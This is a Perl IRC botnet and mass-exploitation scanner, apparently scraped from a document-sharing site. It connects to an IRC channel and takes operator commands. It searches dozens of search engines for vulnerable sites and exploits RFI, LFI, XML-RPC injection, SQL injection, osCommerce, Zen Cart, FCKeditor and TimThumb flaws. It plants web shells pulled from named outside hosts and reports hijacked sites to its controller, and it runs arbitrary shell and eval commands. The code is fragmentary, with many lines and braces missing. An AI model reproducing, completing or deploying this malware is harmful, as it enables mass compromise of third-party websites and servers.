Professional Documents
Culture Documents
/usr/bin/perl
################################################
use HTTP::Request; #
use HTTP::Request::Common; #
use LWP::Simple; #
use LWP::UserAgent; #
use Socket; #
use IO::Socket; #
use IO::Socket::INET; #
use IO::Select; #
use MIME::Base64; #
################################################
my $datetime = localtime;
my $ircserver = "irc.byroe.net";
my $ircport = "6667";
my $nickname = "timlopus";
my $ident = "jems";
my $channel = "#kabo";
my $admin = "Susis";
my $nob0dy = "#15,1(#4@#9AspAlt#15)#";
my $lfilogo = "#15,1(#4@#9LFI#15)";
my $rfilogo = "#15,1(#4@#9RFI#15)";
my $xmllogo = "#15,1(#4@#9XML#15)";
my $sqllogo = "#15,1(#4@#9SQL#15)";
my $oscologo = "#15,1(#4@#9OSCO#15)";
my $zenlogo = "#15,1(#4@#9ZEN#15)";
my $oplogo = "#15,1(#4@#9OPEN#15)";
my $lokologo = "#15,1(#4@#9LOKO#15)";
my $thumblogo = "#15,1(#4@#9TIMTHUMB#15)";
my $lficmd = '!lfi';
my $rficmd = '!rfi';
my $xmlcmd = '!xml';
my $sqlcmd = '!sql';
my $oscocmd = '!osco';
my $zencmd = '!zen';
my $lokocmd = '!loko';
my $opcmd = '!op';
my $thumbcmd = '!thumb';
my $cmdlfi = '!cmdlfi';
my $cmdxml = '!cmdxml';
my $injector = "http://www.kms4u.co.kr/data/cheditor/1704/ipays.jpg";
my $botshell = "http://apnewstime.com//wp-includes/js/byroe.jpg";
my $botshell2 = "http://apnewstime.com//wp-includes/js/allnet.jpg";
my $thumbshell = "http://blogger.com.papetariechic.ro/jack.php";
my $uagent = $uagents[rand(scalar(@uagents))];
my $lfdtest =
"../../../../../../../../../../../../../../../../../../../../../../../../proc/self/
environ%00";
my $open_test =
"/admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my @tabele =
('admin','tblUsers','tblAdmin','user','users','username','usernames','usuario',
'name','names','nombre','nombres','usuarios','member','members','admin_table','miem
bro','miembros','membername','admins','administrator',
'administrators','passwd','password','passwords','pass','Pass','tAdmin','tadmin','u
ser_password','user_passwords','user_name','user_names',
'member_password','mods','mod','moderators','moderator','user_email','user_emails',
'user_mail','user_mails','mail','emails','email','address',
'e-
mail','emailaddress','correo','correos','phpbb_users','log','logins','login','regis
ters','register','usr','usrs','ps','pw','un','u_name','u_pass',
'tpassword','tPassword','u_password','nick','nicks','manager','managers','administr
ador','tUser','tUsers','administradores','clave','login_id','pwd','pas','sistema_id
',
'sistema_usuario','sistema_password','contrasena','auth','key','senha','tb_admin','
tb_administrator','tb_login','tb_logon','tb_members_tb_member',
'tb_users','tb_user','tb_sys','sys','fazerlogon','logon','fazer','authorization','m
embros','utilizadores','staff','nuke_authors','accounts','account','accnts',
'associated','accnt','customers','customer','membres','administrateur','utilisateur
','tuser','tusers','utilisateurs','password','amministratore','god','God','authors'
,
'asociado','asociados','autores','membername','autor','autores','Users','Admin','Me
mbers','Miembros','Usuario','Usuarios','ADMIN','USERS','USER','MEMBER','MEMBERS','U
SUARIO','USUARIOS','MIEMBROS','MIEMBRO');
my @kolumny =
('admin_name','cla_adm','usu_adm','fazer','logon','fazerlogon','authorization','mem
bros','utilizadores','sysadmin','email',
'user_name','username','name','user','user_name','user_username','uname','user_unam
e','usern','user_usern','un','user_un','mail',
'usrnm','user_usrnm','usr','usernm','user_usernm','nm','user_nm','login','u_name','
nombre','login_id','usr','sistema_id','author',
'sistema_usuario','auth','key','membername','nme','unme','psw','password','user_pas
sword','autores','pass_hash','hash','pass','correo',
'userpass','user_pass','upw','pword','user_pword','passwd','user_passwd','passw','u
ser_passw','pwrd','user_pwrd','pwd','authors',
'user_pwd','u_pass','clave','usuario','contrasena','pas','sistema_password','autor'
,'upassword','web_password','web_username');
$SIG{'INT'} = 'IGNORE';
$SIG{'HUP'} = 'IGNORE';
$SIG{'TERM'} = 'IGNORE';
$SIG{'CHLD'} = 'IGNORE';
$SIG{'PS'} = 'IGNORE';
$0 = "$fakeproc"."\0" x 16;;
my $pid = fork;
exit if $pid;
our %irc_servers;
our %DCC;
$sel_client = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
} else {
sub connector {
my $mynick = $_[0];
my $ircserver_con = $_[1];
my $ircport_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp",
PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_client->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
$irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
nick("$mynick");
sleep (1);}}
sub parse {
my $servarg = shift;
sendraw("PONG :$1");
if (lc($1) eq lc($mynick)) {
$mynick = $4;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
nick("$mynick".int rand(1));
}
$mynick = $2;
$irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
$irc_servers{$IRC_cur_socket}{'nome'} = "$1";
sendraw("JOIN $channel");
sleep(2);
my $line_temp;
while( 1 ) {
delete($irc_servers{''}) if (defined($irc_servers{''}));
my @ready = $sel_client->can_read(0);
next unless(@ready);
$mynick = $irc_servers{$IRC_cur_socket}{'nick'};
if ($nread == 0) {
$sel_client->remove($fh);
$fh->close;
delete($irc_servers{$fh});
$ircmsg =~ s/\r\n$//;
my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
my $engine
="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio,WebDe
,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo,BLacK,oNeT,SiZuka,Wa
LLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR";
if ($path eq $mynick) {
if ($msg =~ /^#VERSION#/) {
sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
if ($msg =~ /^#TIME#/) {
&shell("$path","kill -9 $$");
&shell("$path","killall -9 perl");
sendraw("QUIT :Restarting...");
sendraw("JOIN #".$1);
sendraw("PART #".$1);
}
sendraw("NICK ".$1);
&shell("$nick","$msg");
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$nick);
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$nick);
}
}
else {
&shell("$path","kill -9 $$");
&shell("$path","killall -9 perl");
sendraw("QUIT :Restarting...");
sendraw("JOIN #".$1);
sendraw("PART $path");
sendraw("PART #".$1);
}
&shell("$path","$1");
&shell("$path","$1");
eval "$1";
##################################################################### HIT
if ($msg=~ /^$cmdlfi\s+(.+?)\s+(.*)/){
my $url = $1.$lfdtest;
my $cmd = $2;
&cmdlfi($url,$cmd,$path);
if ($msg=~ /^$cmdxml\s+(.+?)\s+(.*)/){
my $url = $1;
my $cmd = $2;
&cmdxml($url,$cmd,$path);
if ($msg=~ /^!help/) {
my $helplogo = "#15,1(#4@#9Help#15)";
&msg("$path","$helplogo #14
######################9[HELP]#14###############################");
&msg("$path","$helplogo #7 ( $rficmd|$lficmd|$sqlcmd|$xmlcmd|
$thumbcmd [bug][dork]|!portscan[ip][port]) )#");
if ($msg=~ /^!engine/) {
my $enginelogo = "#15,1(#4@#9EnginE#15)";
&msg("$path","$enginelogo #4
GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ExaLead,VirgiLio#");
&msg("$path","$enginelogo #4
WebDe,AoL,SaPo,DuCk,YauSe,BaiDu,KiPoT,GiBLa,YahOo,HotBot,LyCos,LyGo#");
&msg("$path","$enginelogo #4
BLacK,oNeT,SiZuka,WaLLa,DeMos,RoSe,SeZnaM,TisCali,NaVeR#");
if ($msg=~ /^!about/) {
if ($msg=~ /^!version/) {
my $versionlogo = "#15,1(#4@#9Version#15)";
if (&isFound($injector,"html")) {
} else {
if ($msg=~ /^$rficmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,1);
} else {
exit;
if ($msg=~ /^$lficmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,2);
} else {
exit;
if ($msg=~ /^$xmlcmd\s+(.*?)\s+(.*)/ ) {
waitpid($pid, 0);
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,3);
} else {
exit;
if ($msg=~ /^$sqlcmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
}
else {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,4);
exit;
if ($msg=~ /^$oscocmd\s+(.*)/) {
waitpid($pid, 0);
else {
if (fork) { exit; } else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ("admin/categories.php/login.php?
cPath=&action=new_product_preview",$1);
&scan_start($path,$bug,$dork,$engine,5);
} else {
exit;
if ($msg=~ /^$oscocmd\s+(.*)/) {
waitpid($pid, 0);
}
else {
if (&isFound($injector,"SkFOQ09L=")) {
my ($bug,$dork) = ("admin/file_manager.php/login.php",
$1);
&scan_start($path,$bug,$dork,$engine,5);
} else {
exit;
if ($msg=~ /^$lokocmd\s+(.*)/) {
waitpid($pid, 0);
}
else {
my ($bug,$dork) = ("filemanager/browser.html",$1);
&scan_start($path,$bug,$dork,$engine,6);
exit;
if ($msg=~ /^$opcmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
&scan_start($path,$bug,$dork,$engine,7);
exit;
if ($msg=~ /^$zencmd\s+(.*)/) {
waitpid($pid, 0);
else {
my ($bug,$dork) =
("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
&scan_start($path,$bug,$dork,$engine,8);
exit;
if ($msg=~ /^$zencmd\s+(.*)/) {
waitpid($pid, 0);
else {
my ($bug,$dork) = ("admin/record_company.php",$1);
&scan_start($path,$bug,$dork,$engine,8);
exit;
}
##################################################################### TIMTHUMB.PHP
SCAN (ADDED)
if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
waitpid($pid, 0);
else {
my ($bug,$dork) = ($1,$2);
&scan_start($path,$bug,$dork,$engine,9);
exit;
#####################################################################
}
}
$line = $lines[$c];
$line_temp = '';
$line =~ s/\r$//;
&parse("$line");
} else {
if ($#lines == 0) {
&parse("$line");
&parse("$line");
&parse("$line");
} else {
$line_temp = $line;
}
}
#########################################
sub type () {
my ($chan,$bug,$dork,$engine,$type) = @_;
if ($type == 1){&rfi($chan,$bug,$dork,$engine);}
sub scan_start() {
my ($chan,$bug,$dork,$engine,$type) = @_;
if ($engine =~ /google/i) {
&type($chan,$bug,$dork,"GooGLe",$type);
} exit; }
if ($engine =~ /google2/i) {
&type($chan,$bug,$dork,"GooGle2",$type);
} exit; }
if ($engine =~ /bing/i) {
&type($chan,$bug,$dork,"Bing",$type);
} exit; }
}
if ($engine =~ /altavista/i) {
&type($chan,$bug,$dork,"ALtaViSTa",$type);
} exit; }
if ($engine =~ /ask/i) {
&type($chan,$bug,$dork,"AsK",$type);
} exit; }
if ($engine =~ /uol/i) {
&type($chan,$bug,$dork,"UoL",$type);
} exit; }
}
if ($engine =~ /yahoo/i) {
&type($chan,$bug,$dork,"YahOo",$type);
} exit; }
if ($engine =~ /clusty/i) {
&type($chan,$bug,$dork,"CluSty",$type);
} exit; }
if ($engine =~ /gutser/i) {
} exit; }
if ($engine =~ /rediff/i) {
&type($chan,$bug,$dork,"ReDiff",$type);
} exit; }
if ($engine =~ /virgilio/i) {
&type($chan,$bug,$dork,"VirgiLio",$type);
} exit; }
if ($engine =~ /webde/i) {
&type($chan,$bug,$dork,"WebDe",$type);
} exit; }
if ($engine =~ /exalead/i) {
&type($chan,$bug,$dork,"ExaLead",$type);
} exit; }
if ($engine =~ /lycos/i) {
&type($chan,$bug,$dork,"LyCos",$type);
} exit; }
if ($engine =~ /hotbot/i) {
if ($pid = fork) { waitpid($pid, 0); }
&type($chan,$bug,$dork,"HotBot",$type);
} exit; }
if ($engine =~ /aol/i) {
&type($chan,$bug,$dork,"AoL",$type);
} exit; }
if ($engine =~ /sapo/i) {
&type($chan,$bug,$dork,"SaPo",$type);
} exit; }
}
if ($engine =~ /duck/i) {
&type($chan,$bug,$dork,"DuCk",$type);
} exit; }
if ($engine =~ /lygo/i) {
&type($chan,$bug,$dork,"LyGo",$type);
} exit; }
if ($engine =~ /yause/i) {
&type($chan,$bug,$dork,"YauSe",$type);
} exit; }
}
if ($engine =~ /baidu/i) {
&type($chan,$bug,$dork,"BaiDu",$type);
} exit; }
if ($engine =~ /kipot/i) {
&type($chan,$bug,$dork,"KiPoT",$type);
} exit; }
if ($engine =~ /gibla/i) {
&type($chan,$bug,$dork,"GiBLa",$type);
} exit; }
if ($engine =~ /black/i) {
&type($chan,$bug,$dork,"BLacK",$type);
} exit; }
if ($engine =~ /onet/i) {
&type($chan,$bug,$dork,"oNeT",$type);
} exit; }
if ($engine =~ /sizuka/i) {
&type($chan,$bug,$dork,"SiZuka",$type);
} exit; }
if ($engine =~ /walla/i) {
&type($chan,$bug,$dork,"WaLLa",$type);
} exit; }
if ($engine =~ /demos/i) {
&type($chan,$bug,$dork,"DeMos",$type);
} exit; }
if ($engine =~ /rose/i) {
if ($pid = fork) { waitpid($pid, 0); }
&type($chan,$bug,$dork,"RoSe",$type);
} exit; }
if ($engine =~ /seznam/i) {
&type($chan,$bug,$dork,"SeZnaM",$type);
} exit; }
if ($engine =~ /tiscali/i) {
&type($chan,$bug,$dork,"TisCali",$type);
} exit; }
}
if ($engine =~ /naver/i) {
&type($chan,$bug,$dork,"NaVeR",$type);
} exit; }
#########################################
sub rfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$rfilogo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
my $coba = "http://".$site.$bug."test??";
my $test = "http://".$site.$bug.$injector."??";
my $dor = "http://".$site.$bug.$botshell."??";
my $dor2 = "http://".$site.$bug.$botshell2."??";
my $cek = &get_content($coba);sleep(1);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
&rfi_xpl($test,$chan,$site);
exit;}
}
sub rfi_xpl() {
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $dor = $url.$botshell."??";
my $dor2 = $url.$botshell2."??";
my $test = $url.$injector."??";
my $vuln = $url."#14(ByroeNet)";
my $check = &get_content($test);
&get_content($dor);sleep(1);
&get_content($dor2);sleep(1);
my $safe ="";
my $os ="";
my $free ="";
sub lfi() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lfilogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $dir = "../../../../../../../../../../../../../";
my $test = "http://".$site.$bug.$dir."/proc/self/environ%0000";
my $vuln = "http://".$site."#12".$bug.$dir."/proc/self/environ%0000";
my $shell = "http://".$site."#12".$bug.$dir."/tmp/ipays%0000";
my $html = &get_content($test);
my $code = 'echo
"c0li#".php_uname()."#c0li".get_current_user();if(@copy("'.
$injector.'","/tmp/ipays")) { echo "SUCCESS";@copy("'.
$botshell.'","/tmp/dev");@copy("'.$botshell2.'","/tmp/maza"); }';
my $res = lfi_env_query($test,encode_base64($code));
&lfi_spread_query($test);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");
$res =~ s/\n//g;
if ($res =~ /c0li#(.*)#c0li(.*)SUCCESS/sg) {
my $sys = $1;
$nob0dy = $2;
my $sys = $1;
$nob0dy = $2;
my $wget = lfi_env_query($test,encode_base64($upload));
sleep(2);
my $check = &get_content("http://".$site.$bug.
$dir."/tmp/ipays%0000"); sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/dev%0000");sleep(2);
&get_content("http://".$site.$bug.$dir."/tmp/maza%0000");sleep(2);
&msg("$admin","$lfilogo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 ".$shell."
#15(#4@#3".$sys."#15)#15(#4@#9$nob0dy#15)#");sleep(2);
else {
} exit; }
else
{ &msg("$chan","$lfilogo(#4@#8$engine#15)#15(#4@#9EnviRon#15)#10 ".$vuln); }
} exit; } sleep(2);
sub lfi_env_query() {
my $url = $_[0];
my $code = $_[1];
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
}
sub lfi_spread_query() {
my $url = $_[0];
$ua->timeout(7);
my $res = $ua->request($req);
sub xml() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$xmllogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site.$bug;
my $vuln = "http://".$site."#13".$bug;
my $html = &get_content($test);
if ($html =~ /faultCode/ ) {
my $resp = &xml_cek_query($test);
if ($resp =~ /j13mb0t(.*)j13mb0t/s) {
&xml_spread_query($test);sleep(2);
my $sys = $1;
my $check = &get_content("http://".$site."aspaltx.php");
&get_content("http://".$site."byroe.php");
&get_content("http://".$site."allnet.php");
else {
sleep(2); } exit; } }
sub xml_cek_query() {
my $url = $_[0];
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13mb0t';".
$code."echo'j13mb0t';exit;/*</name></value></param></params></methodCall>";
$ua->timeout(7);
my $res = $ua->request(POST $url, Content_Type => 'text/xml', Content => $exploit);
return $res->content;
sub xml_spread_query() {
my $xmltargt = $_[0];
$exploit .= "<methodName>test.method</methodName>";
$exploit .= "<params><param><value><name>',''));";
$exploit .= "echo'j13m';".
$xmlsprd."echo'b0T';exit;/*</name></value></param></params></methodCall>";
$userAgent->timeout(7);
sub sql() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$sqllogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site.$bug."'";
my $vuln = "http://".$site."#4".$bug;
my $sqlsite = "http://".$site.$bug;
my $html = &get_content($test);
&sqlbrute($sqlsite,$chan,$engine);}
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsSQL#15)#13 ".
$vuln);}
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9MsAccess#15)#13 ".
$vuln);}
&sqlbrute($sqlsite,$chan,$engine);}
} exit; sleep(2); }
sub sqlbrute() {
my $situs=$_[0];
my $chan =$_[1];
my $engine=$_[2];
my $columns=20;
my $cfin.="--";
my $cmn.= "+";
$union.=','.$column;
$inyection.=','."0x6c6f67696e70776e7a";
if ($column == 0)
$inyection = '';
$union = '';
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cfin;
$response=get($sql);
if($response =~ /loginpwnz/)
$column ++;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cfin;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."information_schema.tables".$cfin;
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."information_schema.tables".$cfin;
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13INFO_SCHEMA#15)#13
$sql #");
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0x6c6f67696e70776e7a".
$inyection.$cmn."from".$cmn."mysql.user".$cfin;
if($response =~ /loginpwnz/)
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.$cmn."from".
$cmn."mysql.user".$cfin;
else
$loadfile.=','.'load_file(0x2f6574632f706173737764)';
$loadcont++;
}
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."load_file(0x2f6574632f706173737764)".$loadfile.$cfin;
if($response =~ /root:x:/)
else
foreach $tabla(@tabele)
chomp($tabla);
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."0x6c6f67696e70776e7a".$inyection.$cmn."from".$cmn.$tabla.$cfin;
if($response =~ /loginpwnz/)
$sql=$situs."-1".$cmn."union".$cmn."select".$cmn."0".$union.
$cmn."from".$cmn.$tabla.$cfin;
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13Tabel#15)#13 $sql
#");
&tabelka($situs,$tabla,$chan,$engine);
sub tabelka() {
my $situs =$_[0];
my $tabla =$_[1];
my $chan =$_[2];
my $engine=$_[3];
my $cfin.="--";
my $cmn.= "+";
chomp($tabla);
foreach $columna(@kolumny)
chomp($columna);
$sql=$situs."-1".$cmn."union".$cmn."select".
$cmn."concat(0x6c6f67696e70776e7a,0x3a,$columna)".$inyection.$cmn."from".$cmn.
$tabla.$cfin;
if ($response =~ /loginpwnz/)
&msg("$chan","$sqllogo(#4@#8$engine#15)#15(#4@#9SQL#15)(#4@#13SQLi Vuln#15)#9
$situs #14(#4@#13Kolom#14)#13 $columna #14(#4@#13Tabel#14)#13 $tabla #");
sub osco() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
foreach my $site (@list) {
$count++;
my $test = "http://".$site.$bug;
my $html = &get_content($test);
# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);
&osco_xpl($test,$chan,$site,$engine);
} else { }
} exit; sleep(2); }
sub osco_xpl() {
my $browser = LWP::UserAgent->new;
my $url = $_[0];
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);
my $safe ="";
my $os ="";
my $free ="";
&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
sub osco2() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oscologo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site.$bug;
my $html = &get_content($test);
if ($html =~ /TABLE_HEADING_FILENAME/ ) {
# &msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9System#15)#7 ".
$test);
&osco_xpl2($test,$chan,$site,$engine);
} else { }
} exit; sleep(2); }
sub osco_xpl2() {
my $browser = LWP::UserAgent->new;
my $url = $_[0]."?action=processuploads";
my $chan = $_[1];
my $site = $_[2];
my $engine = $_[3];
my $hasil = $res->as_string;
my $hasil1 = $resa->as_string;
my $hasil2 = $resb->as_string;
my $hasil3 = $resc->as_string;
my $check = &get_content("http://".
$site."images/aspaltx.php");&get_content("http://".
$site."images/byroe.php");&get_content("http://".
$site."images/allnet.html");sleep(3);
my $safe ="";
my $os ="";
my $free ="";
&msg("$chan","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4aspaltx.php #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
&msg("$admin","$oscologo(#4@#8$engine#15)#15(#4@#9SHeLL#15)#13 http://".
$site."images/#4allnet.html #9(#4@#15SafeMode= $safe#9)(#4@#15OS= $os#9)
(#4@#15FreeSpace= $free#9)");sleep(2);
sub loko() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$lokologo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".$site."filemanager/browser.html";
my $vuln = "http://".$site."filemanager/browser.html";
my $re = &get_content($test);
if ($re =~ /$loko_output/){
sub op() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$oplogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
if ($count == $num-1) { &msg("$chan","$oplogo(#4@#8$engine#15)#10 Scan
finish"); }
my $test = "http://".$site.$open_test;
my $vuln = "http://".
$site."admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html";
my $re = &get_content($test);
if ($re =~ /$open_output/){
sub zen() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$zenlogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $test = "http://".
$site."admin/record_company.php/password_forgotten.php?action=insert";
my $vuln = "http://".$site."images/#4brons.php";
my $re = &get_content($vuln);
else{
}
######################################### ADDED
sub thumb() {
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $count = 0;
my @list = &search_engine($chan,$bug,$dork,$engine,$thumblogo);
my $num = scalar(@list);
if ($num > 0) {
$count++;
my $coba = "http://".$site.$bug."timthumb.php?src=".$thumbshell."";
my $cek = &get_content($coba);sleep(1);
my $aa = "cache/c54af1d13e884a4c63da8f3098a7a4da.php";
my $ab = "temp/c54af1d13e884a4c63da8f3098a7a4da.php";
my $ceck1 = "http://".$site.$bug.".$aa";
my $ceck2 = "http://".$site.$bug.".$ab";
my $loco1 = &get_content($ceck1);sleep(1);
my $loco2 = &get_content($ceck2);sleep(1);
my $vuln = "http://".$site.
$bug."cache/c54af1d13e884a4c63da8f3098a7a4da.php";
#########################################
sub search_engine() {
my (@total,@clean);
my $chan = $_[0];
my $bug = $_[1];
my $dork = $_[2];
my $engine = $_[3];
my $logo = $_[4];
@clean = &clean(@total);
#########################################
sub isFound() {
my $status = 0;
my $link = $_[0];
my $reqexp = $_[1];
my $res = &get_content($link);
return $status;
sub get_content() {
my $url = $_[0];
$ua->timeout(7);
my $res = $ua->request($req);
return $res->content;
sub google() {
my @list;
my $key = $_[0];
my $search = ("http://www.google.com/search?
q=".&key($key)."&num=100&filter=0&start=".$i);
my $res = &search_engine_query($search);
if ($1 !~ /google/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
}
return @list;
sub rediff() {
my @list;
my $key = $_[0];
my $search = ("http://search1.rediff.com/dirsrch/default.asp?
MT=".&key($key)."&iss=&submit=Search&firstres=".$i);
$b = "$i";
my $res = &search_engine_query($search);
if ($1 !~ /rediff\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub uol() {
my @list;
my $key = $_[0];
my $search = ("http://mundo.busca.uol.com.br/buscar.html?
q=".&key($key)."&start=".$i);
my $res = &search_engine_query($search);
if ($1 !~ /uol\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub bing() {
my @list;
my $key = $_[0];
my $search = ("http://www.bing.com/search?
q=".&key($key)."&filt=all&first=".$i."&FORM=PERE");
my $res = &search_engine_query($search);
if ($res =~ m/Ref A:/g && $res =~ m/Ref B:/g && $res =~ m/Ref C:/g) {$i=500;}
if ($1 !~ /bing\.com/) {
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub altavista() {
my @list;
my $key = $_[0];
my $search = ("http://it.altavista.com/web/results?
itag=ody&kgs=0&kls=0&dis=1&q=".&key($key)."&stq=".$i);
my $res = &search_engine_query($search);
if ($1 !~ /altavista/){
my $link = $1;
$link =~ s/<//g;
$link =~ s/ //g;
my @grep = &links($link);
push(@list,@grep);
return @list;
}
sub ask() {
my @list;
my $key = $_[0];
my $search = ("http://it.ask.com/web?
q=".&key($key)."&qsrc=0&o=0&l=dir&qid=EE90DE6E8F5370F363A63EC61228D4FE&page=".
$i."&jss=1&dm=all");
my $res = &search_engine_query($search);
if ($1 !~ /ask\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub yahoo(){
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.yahoo.com/search?p=".&key($key)."&b=".$b);
my $res = &search_engine_query($search);
if ($1 !~ /yahoo\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub clusty() {
my @list;
my $key = $_[0];
my $b = 0;
my $search = ("http://search.yippy.com/search?query=".&key($key)."&input-
form=clusty-simple&v:sources=webplus&v:state=root|root-".$b."-10|0&");
my $res = &search_engine_query($search);
if ($1 !~ /yippy\.com/){
my $link = $1;
my @grep = &links($link);
push(@list,@grep);
return @list;
sub gutser() {
my @list;
my $key = $_[0];
my $search = ("http://www.goodsearch.com/Search.aspx?
Keywords=".&key($key)."&page=".$b."&osmax=0");
my $res = &search_engine_query($search);
